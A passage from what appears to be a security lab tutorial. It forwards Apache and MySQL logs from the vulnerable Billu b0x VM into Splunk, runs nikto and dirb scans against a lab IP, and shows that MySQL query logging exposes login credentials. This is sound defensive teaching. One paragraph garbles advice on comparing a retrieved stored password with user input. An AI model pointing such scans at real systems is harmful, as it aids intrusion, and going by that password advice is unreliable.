Command:  /opt/splunkforwarder/bin/splunk add monitor /var/log/apache2/access.log

Command: /opt/splunkforwarder/bin/splunk add monitor /var/log/apache2/error.log



17.  Now that we have configured the forwarder to send logs to the server and what logs to send to the server, let's start the splunk forwarder.

Command:  /opt/splunkforwarder/bin/splunk start splunkd


18.  After this is started you may have to wait about 2-5 minutes but then navigate in Splunk to the search box.  In the search query, type index=main and search for the last 24 hours.  You should see the logs.

19.  To generate some logs I created a simple batch script to get the home page of Billu-b0x every tenth of a second for up to 2000 times.  I ran the script from the host.



20.  If all is setup correctly, click splunk in the top-left, click app search and reporting, then in the new search insert "index=main".  You should see the logs coming in, indicating the host is "indishell".


21.  Notice that the wget tool will identify itself in what is called the user-agent.  The user-agent will describe the tool, browser, operating system and other plugins associated with the connecting device to a web server.

22.  With the tool wget you can control the user-agent that is passed.  In the terminal window I specified the user-agent to be "Hello!", then executed it.  I researched the logs and found the log entry that I caused with the tool.


23.  As a penetration tester you should understand what your tools look like in the logs.  As defenders you should know about what these tools produce and should look through logs for anomalies or unique user-agents to detect interesting activity.

24.  In the Billu b0x walk through we used nikto and dirb.  Below I am going to run both tools and we are going to look at the logs to see what is produced from the tools.

Command: nikto -h 172.16.216.129
Command: dirb http://172.16.216.129 /usr/share/wordlists/dirb/big.txt 


Before... 2,002 logs recorded


After nikto... 18,414 logs recorded (Observe the user-agent)



After dirb... 89,683 logs recorded (Observe the user-agent)



Challenge: Can you change the user-agent that is passed with nikto or dirb?

Challenge: Use Splunk to search the logs.  Try and find HTTP code 200 or web sites that exist that were accessed by Nikto or dirb.

25.  Now we are going to setup MySQL to log queries to a file and setup the splunk forwarder to collect those logs.  Login as root to Billu b0x and change to /etc/mysql and modify the my.cnf file.

Command: cd /etc/mysql
Command: vim my.cnf


26.  Scroll-down in the file to the section on "Logging and Replication".  Remove the comment or the "#" in front of "general_log_file" and "general_log".  Then save and exit from vim "<esc> :wq".


27.  Now add the file "/var/log/mysql/mysql.log" to the splunk files to be monitored, also add the error.log.

Command: /opt/splunkforwarder/bin/splunk add monitor /var/log/mysql/mysql.log

Command: /opt/splunkforwarder/bin/splunk add monitor /var/log/mysql/error.log



28.  After configuring the logging of mysql, attempt to login then use splunk to view the query to the database of the username and password.  Notice the search is specific to the mysqld log.

Search: index=main sourcetype=mysqld


29.  The query is logged and now the username and password for the user is in the logs.  Working with a SIEM you need to understand what is in the logs.  Another example is when a query contains a SSN or a credit card number.  Be aware of when this information could be gathered by a SIEM.

Developers should return as results sensitive information but be careful querying for it directly.  For example, you can query for the password of the admin user.  Then with the user input for the password and the returned password compare them and verify they match.  That is after you check to verify if the user exists in the database.

30.  As an ethical hacker or a penetration tester you may want to test your attack in a lab prior to performing it.  I also like to test for vulnerabilities with a proxy and logging enabled.  This helps me to analyze my attacks and how I have to change them to be more effective.

Challenge:  Continue working through the Billu b0x walk through.  Use burp suite and see if you can see in the logs that you are using it as a proxy.




Test Authentication from Linux Console using python3 pexpect

Working with the IT420 lab, you will discover that we need to discover a vulnerable user account.  The following python3 script uses the pex...